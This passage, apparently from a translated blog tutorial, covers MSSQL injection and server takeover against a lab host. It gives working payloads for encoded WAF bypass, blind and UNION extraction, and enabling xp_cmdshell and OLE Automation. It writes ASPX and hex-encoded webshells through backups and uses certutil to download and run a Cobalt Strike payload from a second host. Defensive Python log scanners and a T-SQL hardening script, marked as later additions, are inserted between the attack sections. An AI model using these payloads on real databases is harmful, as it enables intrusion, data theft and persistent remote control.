!important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> varchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2000</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x73656c65637420636f6e7665727428696e742c404076657273696f6e29</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: 
inherit !important;">exec</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><code>select * from admin where id=1;declare @s varchar(2000) set @s= CHAR(115) + CHAR(101) + CHAR(108) + CHAR(101) + CHAR(99) + CHAR(116) + CHAR(32) + CHAR(99) + CHAR(111) + CHAR(110) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(116) + CHAR(40) + CHAR(105) + CHAR(110) + CHAR(116) + CHAR(44) + CHAR(64) + CHAR(64) + CHAR(118) + CHAR(101) + CHAR(114) + CHAR(115) + CHAR(105) + CHAR(111) + CHAR(110) + CHAR(41) exec(@s)--</code></p></li>
   </ol>

Once you have gotten declare past the WAF, the WAF is essentially useless from then on; if you are using HackBar here, remember to URL-encode the plus signs.

Chapter 6: MSSQL Blind Injection and UNION Injection

0x00 Blind injection

Boolean-based blind injection

It is much the same as MySQL: you split the string and compare it piece by piece, though MSSQL genuinely has fewer blind-injection tricks to offer.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 and ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)) >= 109</code></p></li>
   </ol>

Time-based blind injection

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1;if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--</code></p></li>
    <li><p><code>http://192.168.130.137/1.aspx?id=1;if (ascii(substring((select top 1 name from master.dbo.sysdatabases),1,1)))>1 WAITFOR DELAY '0:0:5'--</code></p></li>
   </ol>

Of course you can also use the declare trick mentioned earlier for blind injection; apply it flexibly. For blind injection in general, MSSQL feels less flexible than MySQL.

0x02 UNION injection

For UNION injection in MSSQL we generally do not use numeric placeholders but null, because numeric placeholders may trigger an implicit type conversion.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 union select 1,2,3</code></p></li>
   </ol>

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info</code></p></li>
   </ol>

It can of course also be used like this:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))</code></p></li>
   </ol>

In MSSQL, if we want to bring several values back in a single column, we can use %2B, which is the URL-encoded plus sign (string concatenation):

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info</code></p></li>
   </ol>

Chapter 7: Getting a shell via MSSQL backup

0x00 Introduction

Getting a shell via backup brings up the question of privileges. With SA privileges, unless they have been reduced, you can basically do anything; its database role is db_owner. Other users that also hold db_owner can generally get a shell through backup as well, but once directory permissions have been set, that no longer works.

0x01 Finding the path

When we need the web root path, there are generally a few approaches:

1. Error messages

2. Dictionary guessing

3. Information gathering from neighbouring sites on the same server

4. Calling stored procedures to search

5. Reading configuration files

Here we focus on the stored-procedure approach, that is, using these functions to locate our web root. Generally we can use xp_cmdshell and xp_dirtree.

xp_dirtree, xp_subdirs

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>execute master..xp_dirtree 'c:'      -- list all of c:\ recursively: directories and subdirectories</code></p></li>
    <li><p><code>execute master..xp_dirtree 'c:',1    -- list only the folders directly under c:\</code></p></li>
    <li><p><code>execute master..xp_dirtree 'c:',1,1  -- list folders plus files directly under c:\</code></p></li>
   </ol>

So how do we make use of this? xp_dirtree returns the directory tree for the path we pass in. If you want the file names returned as well, and since the injection has no echo, you can create a temporary table and insert the results into it:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1;CREATE TABLE tmp (dir varchar(8000),num int,num1 int);</code></p></li>
    <li><p><code>http://192.168.130.137/1.aspx?id=1;insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1</code></p></li>
   </ol>

xp_cmdshell

xp_cmdshell makes the search even easier, since we can run cmd commands to search. For example, my web directory contains a file 1.aspx:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>C:\Users\Aleen>for /r c:\ %i in (1*.aspx) do @echo %i</code></p></li>
    <li><p><code>c:\Users\Aleen\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8KB2ZI22\1[1].aspx</code></p></li>
    <li><p><code>c:\www\1.aspx</code></p></li>
   </ol>

So I only need to create a table with a single char column:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1;CREATE TABLE cmdtmp (dir varchar(8000));</code></p></li>
    <li><p><code>http://192.168.130.137/1.aspx?id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i'</code></p></li>
   </ol>

Of course you may find that xp_cmdshell cannot be called. If the error is:

SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用。

it can be re-enabled with the following commands:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>;EXEC sp_configure 'show advanced options',1;  -- allow advanced options to be changed</code></p></li>
    <li><p><code>RECONFIGURE;</code></p></li>
    <li><p><code>EXEC sp_configure 'xp_cmdshell',1;             -- turn on the xp_cmdshell extended procedure</code></p></li>
    <li><p><code>RECONFIGURE;--</code></p></li>
   </ol>

If that still doesn't work, xplog70.dll may need to be restored; deal with it case by case, there are piles of answers for these problems on Baidu.

Other usable stored procedures such as sp_OAMethod are not the focus of this article. Also, since on 2008 xp_cmdshell no longer runs as SYSTEM the way it did on 2005, adding an account is not considered here.
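The requests this chapter walks through (stacked queries feeding xp_dirtree into a temp table, sp_configure enabling xp_cmdshell, backup database, and the %2B concatenation from the basic section) leave a recognisable signature in the web server's access log. The following Python scanner is an added example, not code from the original post: it decodes IIS W3C access-log lines the way the application would and tags those patterns; the log lines, field order, client IPs and database name are constructed assumptions.

```python
"""Tag the stacked-query and extended-procedure patterns from this chapter in
IIS access-log lines.  Added example, not from the original post.  Assumes the
W3C extended format with the default field order (date time s-ip cs-method
cs-uri-stem cs-uri-query s-port cs-username c-ip ...).  The sample lines are
constructed, reusing the post's host 192.168.130.137 and page 1.aspx."""
import re
from urllib.parse import unquote

# Procedures and statements the post uses to find the web root, enable
# xp_cmdshell, write files and run a backup.  Matched case-insensitively.
RISKY_RE = re.compile(
    r"\bxp_cmdshell\b|\bxp_dirtree\b|\bxp_subdirs\b|\bxp_regread\b|"
    r"\bsp_configure\b|\bsp_oa(?:create|method)\b|\bbackup\s+database\b|"
    r"\bopenrowset\b",
    re.IGNORECASE,
)
# ';' followed by a statement keyword is the stacked-query shape 'id=1;...'.
STACKED_RE = re.compile(
    r";\s*(?:create|insert|exec(?:ute)?|declare|backup|reconfigure|update|drop)\b",
    re.IGNORECASE,
)
# Covers both 'union select' and 'union (select' as used in the post.
UNION_RE = re.compile(r"\bunion\b[\s(]+(?:all\s+)?select\b", re.IGNORECASE)
# A literal '+' between identifiers survives decoding only if it was sent as
# %2B: the post's trick for concatenating columns (name%2Bpass).
CONCAT_RE = re.compile(r"\w\s*\+\s*\w")

IIS_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<sip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<port>\d+) (?P<user>\S+) (?P<cip>\S+)"
)


def decode_query(raw):
    """Decode cs-uri-query as the web app will see it.  IIS writes '-' when
    there is no query.  '+' means space in a query string, so it is replaced
    before percent-decoding; %2B then decodes to a real '+' and stays one.
    Percent-decoding repeats (bounded) to unwrap double encoding (%252B)."""
    if raw == "-":
        return ""
    q = raw.replace("+", " ")
    for _ in range(3):
        nxt = unquote(q)
        if nxt == q:
            break
        q = nxt
    return q


def classify(line):
    """Return finding tags for one log line; an empty list means benign."""
    if line.startswith("#"):          # W3C header lines (#Fields:, #Date:)
        return []
    m = IIS_RE.match(line)
    if not m:
        return ["unparsed"]
    q = decode_query(m.group("query"))
    tags = []
    if STACKED_RE.search(q):
        tags.append("stacked-query")
    if UNION_RE.search(q):
        tags.append("union-select")
    for hit in RISKY_RE.finditer(q):
        tags.append("risky:" + re.sub(r"\s+", " ", hit.group(0).lower()))
    if tags and CONCAT_RE.search(q):  # only meaningful beside another finding
        tags.append("concat-via-%2B")
    return tags


def scan(lines):
    """Map client IP -> ordered list of (uri-stem, tags) for flagged lines."""
    findings = {}
    for line in lines:
        tags = classify(line)
        if not tags:
            continue
        m = IIS_RE.match(line)
        cip = m.group("cip") if m else "?"
        stem = m.group("stem") if m else "?"
        findings.setdefault(cip, []).append((stem, tags))
    return findings


# Constructed sample log mirroring the requests shown in this chapter.
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status",
    "2019-03-01 10:00:01 192.168.130.137 GET /1.aspx id=1 80 - 10.0.0.5 Mozilla/5.0 200",
    "2019-03-01 10:00:02 192.168.130.137 GET /1.aspx id=1%20union%20select%20null,name%2Bpass,null%20from%20info 80 - 10.0.0.9 Mozilla/5.0 200",
    "2019-03-01 10:00:03 192.168.130.137 GET /1.aspx id=1;CREATE%20TABLE%20tmp%20(dir%20varchar(8000),num%20int,num1%20int); 80 - 10.0.0.9 Mozilla/5.0 500",
    "2019-03-01 10:00:04 192.168.130.137 GET /1.aspx id=1;insert%20into%20tmp(dir,num,num1)%20execute%20master..xp_dirtree%20'c:',1,1 80 - 10.0.0.9 Mozilla/5.0 500",
    "2019-03-01 10:00:05 192.168.130.137 GET /1.aspx id=1;EXEC%20sp_configure%20'xp_cmdshell',1;RECONFIGURE;-- 80 - 10.0.0.9 Mozilla/5.0 500",
    "2019-03-01 10:00:06 192.168.130.137 GET /1.aspx id=1;backup%20database%20app%20to%20disk%20=%20'c:\\bak.bak';-- 80 - 10.0.0.9 Mozilla/5.0 500",
]

if __name__ == "__main__":
    for cip, hits in scan(SAMPLE_LOG).items():
        for stem, tags in hits:
            print(f"{cip} {stem} {', '.join(tags)}")
```

Correlating the flagged client with the SQL Server error log and the sys.configurations change for xp_cmdshell gives the host-side confirmation; on the 2008 box the post targets, xp_cmdshell is off by default and any RECONFIGURE that turns it on is worth alerting on.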

xp_regread

This reads the registry; it is only useful on Win2000, so not much to say:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots','/'</code></p></li>
   </ol>

0x02 Getting a shell with xp_cmdshell

Although this chapter is about getting a shell via backup, a side note: once we have found the directory and have the privileges to call xp_cmdshell to write files, it is easy and no backup is needed.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\404.aspx' ;</code></p></li>
   </ol>

Because writing a webshell through cmd has to deal with all these escaping issues, when conditions allow you can also use certutil or a vbs script to download it instead.

0x03 Differential backup

Cases where a webshell can be obtained via xp_cmdshell are not that common any more; backup-to-shell is still fairly common, and anyone who has done it knows the steps:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>1. backup database DBNAME to disk = 'c:\bak.bak';-- DBNAME is the target database name</code></p></li>
    <li><p><code>2. create table [dbo].[test] ([cmd] [image]);</code></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">3.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> insert </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">into</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> test</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">cmd</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> values</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x3C25657865637574652872657175657374282261222929253E</span><span class="pun" style="box-sizing: 
border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">4.</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> backup database </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">库名</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> to disk</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'C:\d.asp'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> WITH DIFFERENTIAL</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">FORMAT</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;--</span></code></span></span></p></li>
   </ol>

A differential backup can fail for several reasons, and the usual one is directory permissions: the directory used for the first backup may not be writable, and the web directory used for the second may not be either. As a rule, do not back up straight to the root of the C: drive.

When special characters such as the single quote or path separators are filtered, the technique described earlier, defining a local variable and executing it, can be used instead.

0x04 LOG backup

A LOG backup requires that the database has been backed up before and that its recovery model is FULL, at least on 2008. In return the log backup file is much smaller. If your privileges are high enough you can set the recovery model yourself:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>alter database 库名 set RECOVERY FULL</code></p></li>
   </ol>
   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>1. alter database 库名 set RECOVERY FULL</code></p></li>
    <li><p><code>2. create table cmd (a image)</code></p></li>
    <li><p><code>3. backup log 库名 to disk = 'c:\xxx' with init</code></p></li>
    <li><p><code>4. insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253E)</code></p></li>
    <li><p><code>5. backup log 库名 to disk = 'c:\xxx\2.asp'</code></p></li>
   </ol>

Compared with the differential backup, the advantage of the log backup is that the resulting webshell file is very small: my database has hardly anything in it, and where the differential backup produced a 2000k file, this one is only 83k.

Chapter 8: MSSQL privilege escalation and web/database separation

0x00 xp_cmdshell

The backup chapter already mentioned this procedure. When the web server and database server are separate hosts, a webshell cannot be written, and the admin back end does not yield a shell either, it is worth trying xp_cmdshell to download a RAT and take the database server directly. The common approaches to downloading the file are:

1.certutil

2.vbs

3.bitsadmin

4.powershell

5.ftp

Here I use Cobalt Strike (if you are not familiar with it, see the CS tutorial I wrote earlier), which makes these steps convenient. I take certutil as the example; usage of the others is widely documented online.

Upload to a directory that is both readable and writable:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>exec master.dbo.xp_cmdshell 'cd c:\www &amp; certutil -urlcache -split -f http://192.168.130.142:80/download/file.exe';</code></p></li>
    <li><p><code>exec master.dbo.xp_cmdshell 'cd c:\www &amp; file.exe';</code></p></li>
   </ol>

Along the way I also used the MS14-058 exploit bundled with CS to escalate privileges.

0x01 sp_oacreate

When xp_cmdshell has been removed, you can try this procedure for privilege escalation instead. First re-enable sp_oacreate:

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>EXEC sp_configure 'show advanced options', 1;</code></p></li>
    <li><p><code>RECONFIGURE WITH OVERRIDE;</code></p></li>
    <li><p><code>EXEC sp_configure 'Ole Automation Procedures', 1;</code></p></li>
    <li><p><code>RECONFIGURE WITH OVERRIDE;</code></p></li>
    <li><p><code>EXEC sp_configure 'show advanced options', 0;</code></p></li>
   </ol>

sp_oacreate is a very dangerous stored procedure: it can delete, copy and move files, and combined with sp_oamethod it can write files and execute cmd.
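Both escalation paths in this chapter, xp_cmdshell and the OLE Automation procedures, go through sp_configure first, and the sequence shown above turns 'show advanced options' back off afterwards, which hides the change from a casual look at the configuration. The Python below is an added example, not part of the original post, that walks captured statements in order and flags a dangerous option being enabled, the advanced-options flag being hidden again after such a change, and any later xp_cmdshell or sp_oa* call. It assumes, as the previous example did, that the statements come one per line from an audit source that records batch text; the sample log is constructed.

```python
"""Flag enabling of dangerous SQL Server options and OLE Automation use (added example).

Assumed input: captured T-SQL statements, one per line, in execution order,
for example from a SQL Server Audit that records batch text. SAMPLE_LOG below
is constructed for this example.
"""
import re
from typing import Dict, List

# sp_configure options that give the server a route to running OS code.
DANGEROUS_OPTIONS = {
    "xp_cmdshell",
    "ole automation procedures",
    "clr enabled",
    "ad hoc distributed queries",
}

# Procedures that are only usable once 'Ole Automation Procedures' is on.
OA_PROCEDURES = ("sp_oacreate", "sp_oamethod", "sp_oagetproperty", "sp_oasetproperty")

SP_CONFIGURE = re.compile(r"sp_configure\s+'([^']+)'\s*,\s*(\d+)", re.IGNORECASE)
XP_CMDSHELL_CALL = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)


def audit(lines: List[str]) -> List[str]:
    """Walk statements in order and return human-readable findings."""
    findings: List[str] = []
    state: Dict[str, int] = {}  # option name -> last value set in this statement stream
    for n, line in enumerate(lines, 1):
        m = SP_CONFIGURE.search(line)
        if m:
            option, value = m.group(1).lower(), int(m.group(2))
            if option in DANGEROUS_OPTIONS and value == 1:
                findings.append(f"line {n}: '{option}' enabled")
            # Turning 'show advanced options' off again right after enabling a
            # dangerous option is the hide-the-change pattern shown on the page.
            if (option == "show advanced options" and value == 0
                    and any(state.get(opt) == 1 for opt in DANGEROUS_OPTIONS)):
                findings.append(
                    f"line {n}: advanced options hidden after enabling a dangerous option")
            state[option] = value
            continue
        lowered = line.lower()
        if any(proc in lowered for proc in OA_PROCEDURES):
            findings.append(f"line {n}: OLE Automation procedure call: {line.strip()}")
        elif XP_CMDSHELL_CALL.search(line):
            findings.append(f"line {n}: xp_cmdshell call: {line.strip()}")
    return findings


# Constructed sample: the page's enable sequence followed by an OA call and a benign query.
SAMPLE_LOG = [
    "EXEC sp_configure 'show advanced options', 1;",
    "RECONFIGURE WITH OVERRIDE;",
    "EXEC sp_configure 'Ole Automation Procedures', 1;",
    "RECONFIGURE WITH OVERRIDE;",
    "EXEC sp_configure 'show advanced options', 0;",
    "declare @o int",
    "exec sp_oacreate 'Shell.Application', @o out",
    "select count(*) from dbo.orders",
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_LOG):
        print(finding)
```

Because the detector keeps per-option state across the stream, it catches the enable-then-hide sequence even when the three statements arrive in separate batches; a stateless rule that only looks for `sp_configure 'xp_cmdshell', 1` would miss the OLE Automation route entirely.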

On older systems it was used in the following ways:

  1. Calling cmd to execute commands

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>wscript.shell: execute a command</code></p></li>
    <li><p><code>declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c xxx'</code></p></li>
    <li><p><code>Shell.Application: execute a command</code></p></li>
    <li><p><code>declare @o int</code></p></li>
    <li><p><code>exec sp_oacreate 'Shell.Application', @o out</code></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> sp_oamethod </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@o</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'ShellExecute'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">null</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
!important;white-space: inherit !important;">'cmd.exe'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'cmd /c net user >c:\test.txt'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'c:\windows\system32'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">''</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'1'</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span></code></span></span></p></li>
   </ol>
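Both listings in this part of the post, the Shell.Application command above and the scripting.filesystemobject write that follows under the next heading, go through sp_oacreate / sp_oamethod, which only work while the server-level option 'Ole Automation Procedures' is on and, by default, only for members of sysadmin. The T-SQL below is an added example written from the defending side; it is not code from the original post. It reports the state of that option (and of xp_cmdshell), turns both off, lists the logins that could turn them back on, and searches the plan cache for batches that already called the OLE procedures. Only standard SQL Server 2008+ catalog views and DMVs are used; nothing else is assumed.

```sql
-- Added defensive check (not from the original post). Run as a login with ALTER SETTINGS,
-- e.g. a member of sysadmin, on SQL Server 2008 or later.

-- 1. Current state of the options the OLE automation snippets rely on.
--    value_in_use = 1 means the option is active right now.
SELECT name, value, value_in_use, is_advanced
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures', 'xp_cmdshell', 'show advanced options');

-- 2. Turn both off. They are "advanced" options, so they can only be changed while
--    'show advanced options' is 1; RECONFIGURE applies the change without a restart.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 0;  -- blocks sp_oacreate / sp_oamethod
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;

-- 3. Any login in these roles can re-enable the options, so the list should be short
--    and should not contain the web application's own login.
SELECT r.name AS server_role, m.name AS member_login, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
ORDER BY r.name, m.name;

-- 4. Search the plan cache for batches that already called the OLE procedures.
--    Best effort only: the cache is emptied on restart and under memory pressure,
--    so a server audit or Extended Events session is the durable record.
SELECT qs.last_execution_time, qs.execution_count, st.text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%sp_oacreate%' OR st.text LIKE '%sp_oamethod%'
ORDER BY qs.last_execution_time DESC;
```

Step 2 is the setting that actually closes the door: with 'Ole Automation Procedures' at 0 every call to sp_oacreate fails regardless of the caller's role, so the injection point can no longer be turned into a file write or a process launch. Step 3 matters because the whole chain assumes the application's database login is sysadmin; a login with only db_datareader / db_datawriter on its own database cannot run sp_configure or the OLE procedures at all.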
   1. Writing a startup item

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@sp_passwordxieo</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@f</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px 
